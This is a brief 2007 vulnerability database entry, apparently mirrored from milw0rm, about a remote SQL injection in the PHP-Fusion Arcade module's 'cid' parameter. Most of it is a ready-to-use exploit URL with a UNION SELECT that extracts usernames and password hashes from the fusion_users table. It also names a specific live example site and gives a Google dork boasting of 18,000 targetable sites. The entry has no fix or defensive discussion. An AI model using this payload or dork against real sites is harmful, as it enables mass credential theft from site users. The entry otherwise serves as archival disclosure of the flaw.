PHP-FUSION Arcade Module (cid) Remote SQL Injection Vuln

2007-04-05T00:00:00
ID SECURITYVULNS:DOC:16590
Type securityvulns
Reporter Securityvulns
Modified 2007-04-05T00:00:00

Description


PHP-FUSION Arcade Module (cid) Remote SQL Injection Vuln


Bulan: xoron

xoron.biz


Exploit:

index.php?op=view_game_list&cid=-1//union//select//null,user_name,user_password,null,null,null//from/*/fusion_users/


Exapmle: http://www.basicwallpapers.dk/infusions/arcade/


Google Dork: /infusions/arcade/ 18.000 sites:)


Ekin0x / --> evilc0der.org <--


milw0rm.com [2007-04-02]